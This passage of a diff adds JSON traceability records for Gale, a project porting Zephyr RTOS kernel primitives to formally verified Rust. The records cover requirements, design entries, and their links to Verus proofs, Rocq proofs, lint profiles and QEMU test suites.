+      "title": "SC8: resume adds suspended thread back to run queue",
+      "type": "sw-req"
+    },
+    {
+      "description": "FIFO queue item counter model. Tracks item count for put/get validation. Thin wrapper around queue — enqueues at tail, dequeues from head. Actual data storage stays in C — Gale verifies counter safety only. No unsafe code.\n",
+      "id": "SWARCH-FI-001",
+      "links": [
+        {
+          "target": "SWREQ-FI-FI01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-FI-FI02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-FI-FI03",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "architecture"
+      ],
+      "title": "FIFO module (gale::fifo)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Zephyr scheduler priority inversion and high-priority thread tests executed on qemu_cortex_m3. Validates priority ceiling, inheritance, and preemption correctness for high-priority threads with Gale integration. Test suite: zephyr/tests/kernel/sched.\n",
+      "id": "SV-HP-001",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "High-Priority Thread Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all event code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-EV-003",
+      "links": [
+        {
+          "target": "SWREQ-EV-EV07",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Event Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When the buffer is empty (size == 0), get returns EAGAIN without modifying state.\n",
+      "id": "SWREQ-RB-RB06",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "get",
+        "asil-d"
+      ],
+      "title": "RB6: get on empty buffer returns error",
+      "type": "sw-req"
+    },
+    {
+      "description": "Integration tests confirm that trivial kernel primitives (those with single-line C implementations) are correctly passed through to the upstream Zephyr C implementations without modification. Verified by running the full Zephyr test suite with CONFIG_GALE_TRIVIAL=y and confirming all tests pass. Executed via: .github/workflows/zephyr-tests.yml\n",
+      "id": "FV-TRIV-001",
+      "links": [
+        {
+          "target": "SWREQ-TRIV-T01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-6"
+      ],
+      "title": "Trivial primitives pass-through verification",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Return 0 for idle/prevented/ineligible threads; per-thread slice if defined; global slice if preemptible and priority <= max_prio. C source: kernel/timeslicing.c lines 39-59.\n",
+      "id": "SWDD-TS-SLICE-SIZE",
+      "links": [
+        {
+          "target": "SWARCH-TS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TS-TS02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "eligibility"
+      ],
+      "title": "Timeslice::slice_size — z_time_slice_size port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Validates capacity > 0 and overhead < capacity. Constructs Heap with 2 chunks (metadata + 1 free). C source: lib/heap/heap.c lines 528-592.\n",
+      "id": "SWDD-HP-INIT",
+      "links": [
+        {
+          "target": "SWARCH-HP-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-HP-HP01",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-HP-HP02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-HP-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "init"
+      ],
+      "title": "Heap::init — sys_heap_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "The stack capacity is always strictly positive. Enforced by init rejecting capacity == 0 with -EINVAL. Maps to stack.c:27-42.\n",
+      "id": "SWREQ-SK-SK02",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SK-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "SK2: capacity > 0 (always after init)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS poll shall provide a mechanism to monitor multiple kernel objects simultaneously, checking each object's readiness condition and reporting which objects are ready.\n",
+      "id": "ZEP-SRS-PL-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-PL",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-PL-PL01",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PL-PL02",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-PL-PL03",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "poll"
+      ],
+      "title": "Zephyr: Poll Monitors Multiple Kernel Objects",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The kernel primitives cannot deadlock: mutex and condvar designs prohibit lock cycles; every blocking operation accepts a timeout (SC-4); and priority inheritance (SC-2) prevents priority inversion chains.  Proven by Rocq theorem proofs and Kani bounded model checking.\n",
+      "id": "G-4",
+      "links": [
+        {
+          "target": "G-1",
+          "type": "sub-goal-of"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "safety",
+        "asil-d",
+        "deadlock",
+        "mutex",
+        "condvar"
+      ],
+      "title": "No deadlock in kernel synchronization primitives",
+      "type": "safety-goal"
+    },
+    {
+      "description": "acquire() (non-recursive) rejects a lock already held by the same owner, returning EBUSY.\n",
+      "id": "SWREQ-SL-SL05",
+      "links": [
+        {
+          "target": "SYSREQ-SL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "safety",
+        "asil-d"
+      ],
+      "title": "SL5: no double-acquire without nesting support",
+      "type": "sw-req"
+    },
+    {
+      "description": "At all times during normal operation (outside of GC), at least one sector is in the EMPTY state, available as a spare for GC compaction.  This invariant ensures that GC can always make progress and that the system never enters a state where all sectors are full with no compaction target.\n",
+      "id": "SWREQ-ZMS-P03",
+      "links": [
+        {
+          "target": "SYSREQ-ZMS-003",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zms",
+        "spare-sector",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "P3: Pre-erased spare sector maintained at all times",
+      "type": "sw-req"
+    },
+    {
+      "description": "Device initialization ordering model with init/init_device/ advance_level/check_deps_satisfied/is_device_ready. Tracks init levels, device state, and dependencies. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-DI-001",
+      "links": [
+        {
+          "target": "SWREQ-DI-DI01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-DI-DI05",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-DI-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "architecture"
+      ],
+      "title": "Device init module (gale::device_init)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "Newly created kernel objects have no permission bits set (thread_perms == 0).\n",
+      "id": "SWREQ-US-US06",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "init",
+        "asil-d"
+      ],
+      "title": "US6: no permission bits set for uninitialized objects",
+      "type": "sw-req"
+    },
+    {
+      "description": "Zephyr kernel sleep and delay tests executed on qemu_cortex_m3. Validates k_sleep, k_msleep, k_usleep accuracy and thread scheduling interaction with Gale timer integration. Test suite: zephyr/tests/kernel/sleep.\n",
+      "id": "SV-SL-001",
+      "links": [
+        {
+          "target": "SYSREQ-SL-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Sleep Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Wake all waiting threads. Returns the number of threads woken.\n",
+      "id": "SWDD-CV-BROADCAST",
+      "links": [
+        {
+          "target": "SWARCH-CV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-CV-C04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-CV-C05",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-CV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "broadcast"
+      ],
+      "title": "CondVar::broadcast — z_impl_k_condvar_broadcast port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Freeing a chunk returns exactly the allocated byte count back to the free pool.\n",
+      "id": "SWREQ-HP-HP04",
+      "links": [
+        {
+          "target": "SYSREQ-HP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "heap",
+        "free",
+        "asil-d"
+      ],
+      "title": "HP4: free returns exactly what was allocated (no partial free)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full Zephyr kernel stack test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_STACK=y. Tests exercise the complete k_stack API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suites: zephyr/tests/kernel/stack (contexts, fail, usage, usage_1cpu).\n",
+      "id": "SV-SK-001",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Stack Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Zephyr's condition variable built on top of wait queue primitives. Contains z_impl_k_condvar_signal, z_impl_k_condvar_broadcast, z_impl_k_condvar_wait.  The Gale port is a pure wait queue wrapper with no FFI — safety by composition.\n",
+      "id": "PROV-CV-001",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "upstream",
+        "condvar",
+        "kernel"
+      ],
+      "title": "Zephyr kernel/condvar.c — condition variable implementation",
+      "type": "source-provenance"
+    },
+    {
+      "description": "The ring buffer consistency invariant: tail tracks head + size modulo capacity.\n",
+      "id": "SWREQ-RB-RB07",
+      "links": [
+        {
+          "target": "SYSREQ-RB-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "ring-buf",
+        "consistency",
+        "asil-d"
+      ],
+      "title": "RB7: size == (tail - head + capacity) % capacity (consistency)",
+      "type": "sw-req"
+    },
+    {
+      "description": "An atomic value model that matches Zephyr's atomic_c.c semantics: get, set, add, sub, or, and, xor, nand, cas, test_and_set, clear. Must preserve correct wrapping arithmetic and CAS semantics.\n",
+      "id": "SYSREQ-AT-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "kernel"
+      ],
+      "title": "Atomic operations model with wrapping arithmetic",
+      "type": "system-req"
+    },
+    {
+      "description": "Hardware-accurate Renode emulation target for Cortex-M4F (ARMv7E-M with FPU) validation.  The stm32f4_disco board with stm32f4_discovery.repl platform runs Gale semaphore tests under Renode 1.16.0 (pre-installed in Zephyr CI Docker image).  Confirms Gale functions correctly on hardware with hardware floating-point and higher clock rates than M3. Chosen because stm32f4_discovery.repl is fully emulated in Renode 1.16.0 with working USART2 for Zephyr console output.\n",
+      "id": "SWARCH-TGT-002",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-KILN-003",
+          "type": "enables"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "test-target",
+        "renode",
+        "cortex-m4f",
+        "stm32f4"
+      ],
+      "title": "Renode emulation target — STM32F4 Discovery (Cortex-M4F)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When put is called and the queue is not full, used_msgs increments by 1 and write_idx advances to the next ring buffer slot. Maps to msg_q.c:130-228.\n",
+      "id": "SWREQ-MQ-MQ05",
+      "links": [
+        {
+          "target": "SYSREQ-MQ-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MQ-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "put",
+        "asil-d"
+      ],
+      "title": "MQ5: put on non-full queue increments used_msgs, advances write_idx",
+      "type": "sw-req"
+    },
+    {
+      "description": "Reset clears the used count to zero and sets the reset flag. Maps to pipe.c:273-285.\n",
+      "id": "SWREQ-PP-PP07",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-PP-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "reset",
+        "asil-d"
+      ],
+      "title": "PP7: reset sets used to 0",
+      "type": "sw-req"
+    },
+    {
+      "description": "wait_any returns true when (value & mask) != 0. wait_all returns true when (value & mask) == mask.\n",
+      "id": "SWDD-EV-WAIT",
+      "links": [
+        {
+          "target": "SWARCH-EV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-EV-EV04",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-EV-EV05",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-EV-EV06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-EV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "wait"
+      ],
+      "title": "Event::wait_any/wait_all — z_impl_k_event_wait port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Fuzz targets in fuzz/fuzz_targets/ exercising random lock/unlock operation sequences and API boundary conditions on mutex. Coverage-guided mutation testing.\n",
+      "id": "UV-MUT-005",
+      "links": [
+        {
+          "target": "SWDD-MUT-LOCK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MUT-UNLOCK",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "fuzz",
+        "swe-4"
+      ],
+      "title": "Mutex fuzz testing (cargo-fuzz)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The idle thread is always present and selectable by next_up as a fallback when no other threads are ready.\n",
+      "id": "SWREQ-SC-SC13",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "idle",
+        "asil-d"
+      ],
+      "title": "SC13: idle thread is always selectable",
+      "type": "sw-req"
+    },
+    {
+      "description": "Replace the Phase 1 C FFI boundary (extern \"C\" functions + C shim) with direct Rust calls from the Kiln WASM runtime.  Gale's verified kernel primitives become Kiln host functions, eliminating the unsafe FFI layer and enabling end-to-end verified compilation from source to ARM binary via the Meld → Loom → Synth pipeline.\n",
+      "id": "STKH-002",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "kiln",
+        "integration",
+        "phase-2"
+      ],
+      "title": "Eliminate C FFI via PulseEngine Kiln integration",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Gale shall replace all safety-critical kernel logic: synchronization primitives, IPC, scheduling decisions, memory allocation tracking, and timeout/timer management. Infrastructure and monitoring modules are explicitly out of scope.\n",
+      "id": "SYSREQ-COV-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "coverage",
+        "scope"
+      ],
+      "title": "Kernel replacement scope — safety-critical logic only",
+      "type": "system-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a blocking get operation on a queue, with a configurable timeout period allowing threads to wait until an item is available.\n",
+      "id": "ZEP-SRS-QU-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-QU",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-QU-QU03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-QU-QU04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "queue"
+      ],
+      "title": "Zephyr: Queue Blocking Get With Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Verus specifications in src/timer.rs with requires/ensures clauses that formally verify timer properties (TM01-TM08) via SMT solving. Proves expiry counter safety, lifecycle state transitions, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-TM-001",
+      "links": [
+        {
+          "target": "SWREQ-TM-TM01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM08",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Timer Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Full Zephyr kernel timer test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_TIMER=y. Tests exercise timer start/stop, periodic/one-shot, status get/sync, user data, and remaining time through the Gale FFI/C shim layer. Test suite: zephyr/tests/kernel/timer/timer_api.\n",
+      "id": "SV-TM-001",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Timer Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Verus specifications in src/timeslice.rs with requires/ensures clauses that formally verify timeslice properties (TS01-TS06) via SMT solving. Proves slice selection, eligibility determination, reset/expiry correctness, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-TS-001",
+      "links": [
+        {
+          "target": "SWREQ-TS-TS01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TS-TS02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TS-TS03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TS-TS04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TS-TS05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TS-TS06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Timeslice Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Integration tests exercising start-stop roundtrips, lock-unlock sequences, and multi-CPU lifecycle management.\n",
+      "id": "IV-SM-001",
+      "links": [
+        {
+          "target": "SWARCH-SM-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "SmpState integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all mutex code. Denies arithmetic_side_effects, unwrap_used, expect_used, panic, indexing_slicing, cast_possible_truncation, cast_possible_wrap, cast_sign_loss. Configured in Cargo.toml [lints.clippy].\n",
+      "id": "FV-MUT-003",
+      "links": [
+        {
+          "target": "SWREQ-MUT-M01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MUT-M09",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Mutex Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "For each kernel primitive ported from C to Rust, establish a formal or semi-formal argument that the Rust implementation preserves the observable behavior of the original C code. Approaches (in order of rigor):\n1. **Functional equivalence testing** (existing): run Zephyr's own test\n   suite against both C and Gale implementations, compare results.\n2. **VERT-style bounded model checking**: compile both C and Rust to a\n   common IR (WASM or LLVM), use Kani BMC to prove equivalence within\n   bounded inputs.\n3. **Refinement proof** (aspirational): prove in Rocq that the Rust model\n   refines the C specification, using formal C semantics (CompCert Clight\n   or similar) as source model.\n\nLevel (1) is implemented. Level (2) should be added as a CI check. Level (3) is a long-term goal tied to Rocq proof development.\n",
+      "id": "REQ-TRACTOR-001",
+      "links": [
+        {
+          "target": "SYSREQ-TRACTOR-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "FIND-001",
+          "type": "traces-to"
+        },
+        {
+          "target": "FIND-002",
+          "type": "traces-to"
+        },
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "related-to"
+        },
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "related-to"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "translation-validation",
+        "equivalence",
+        "safety"
+      ],
+      "title": "Translation validation: verify Gale Rust preserves Zephyr C semantics",
+      "type": "sw-req"
+    },
+    {
+      "description": "Enqueue an item at the head. Increment count by 1, return OK.\n",
+      "id": "SWDD-QU-PREPEND",
+      "links": [
+        {
+          "target": "SWARCH-QU-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-QU-QU03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-QU-QU06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "prepend"
+      ],
+      "title": "Queue::prepend — k_queue_prepend port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "On success, write_check returns n > 0 where n <= request_len and n <= free space.  used is incremented by n. Maps to pipe.c:147-218.\n",
+      "id": "SWREQ-PP-PP05",
+      "links": [
+        {
+          "target": "SYSREQ-PP-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "pipe",
+        "write",
+        "asil-d"
+      ],
+      "title": "PP5: write_check computes correct byte count (min of request and free)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Lean 4 proofs of scheduling theory properties: rate-monotonic analysis (RMA) utilization bound, priority ceiling protocol correctness, and priority queue ordering lemmas. Proofs in proofs/lean/ (Scheduling.lean, PriorityCeiling.lean, PriorityQueue.lean).\n",
+      "id": "FV-SC-004",
+      "links": [
+        {
+          "target": "SWREQ-SC-SC03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SC-SC12",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "lean4",
+        "scheduling-theory",
+        "swe-6"
+      ],
+      "title": "Scheduler Lean 4 scheduling theory proofs",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Integration tests in tests/stack_integration.rs exercising the full stack API surface across module boundaries. Tests init validation, push/pop operations, full/empty boundaries, roundtrip, fill-drain, conservation invariant, interleaved operations, and stress cycles.\n",
+      "id": "IV-SK-001",
+      "links": [
+        {
+          "target": "SWARCH-SK-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Stack integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Integration tests exercising full work item lifecycle including submit-run-finish and submit-cancel-finish sequences.\n",
+      "id": "IV-WK-001",
+      "links": [
+        {
+          "target": "SWARCH-WK-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "integration",
+        "swe-5"
+      ],
+      "title": "Work integration tests",
+      "type": "sw-integration-verification"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/event_proofs.v targeting event bitmask invariant preservation via theorem proving on the coq_of_rust translation. Independent verification path from Verus. Executed via: bazel test //proofs:event_proofs_test\n",
+      "id": "FV-EV-002",
+      "links": [
+        {
+          "target": "SWREQ-EV-EV01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-EV-EV07",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "Event Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Syscall validation rejects type mismatches (returns EBADF) unless expected_type is Any (wildcard).\n",
+      "id": "SWREQ-US-US04",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "type-check",
+        "asil-d"
+      ],
+      "title": "US4: object type validation (type must match expected type)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/pipe_proofs.v targeting pipe invariant preservation (state machine correctness, write/read byte accounting, conservation, reset empties, close clears flags) via theorem proving on the coq_of_rust translation. Independent verification path from Verus. Executed via: bazel test //proofs:pipe_proofs_test\n",
+      "id": "FV-PP-002",
+      "links": [
+        {
+          "target": "SWREQ-PP-PP01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-PP-PP09",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "Pipe Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/stack_config.rs with requires/ensures clauses that formally verify stack config properties (SK_S1-SK_S5) via SMT solving. Proves validation correctness, usable_size computation, SP bounds checking, and guard region safety. Executed via: bazel test //:verus_test\n",
+      "id": "FV-SKS-001",
+      "links": [
+        {
+          "target": "SWREQ-SKS-SK01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SKS-SK02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SKS-SK03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SKS-SK04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SKS-SK05",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "StackConfig Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Enqueue an item at the tail. Increment count by 1, return OK.\n",
+      "id": "SWDD-FI-PUT",
+      "links": [
+        {
+          "target": "SWARCH-FI-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-FI-FI02",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-FI-FI06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fifo",
+        "put"
+      ],
+      "title": "Fifo::put — k_fifo_put port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Dynamic thread pool model with init/alloc/free/can_serve. Tracks active stack count against pool maximum. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-DY-001",
+      "links": [
+        {
+          "target": "SWREQ-DY-DY01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-DY-DY02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-DY-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "dynamic",
+        "architecture"
+      ],
+      "title": "Dynamic pool module (gale::dynamic)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "The storage subsystem shall support a reserved capacity mechanism where a configurable portion of flash is reserved exclusively for safety-critical writes.  Non-safety writes shall be rejected when accepting them would reduce free space below the safety reserve threshold.  Safety writes are always admitted if physical space exists.\n",
+      "id": "SYSREQ-ZMS-005",
+      "links": [
+        {
+          "target": "STKH-ZMS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "storage",
+        "reserved-capacity",
+        "safety",
+        "zms"
+      ],
+      "title": "Reserved capacity — safety data has guaranteed storage",
+      "type": "system-req"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/timer_proofs.v targeting timer expiry counter invariant preservation via theorem proving on the coq_of_rust translation. Independent verification path from Verus. Executed via: bazel test //proofs:timer_proofs_test\n",
+      "id": "FV-TM-002",
+      "links": [
+        {
+          "target": "SWREQ-TM-TM01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-TM-TM05",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "Timer Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
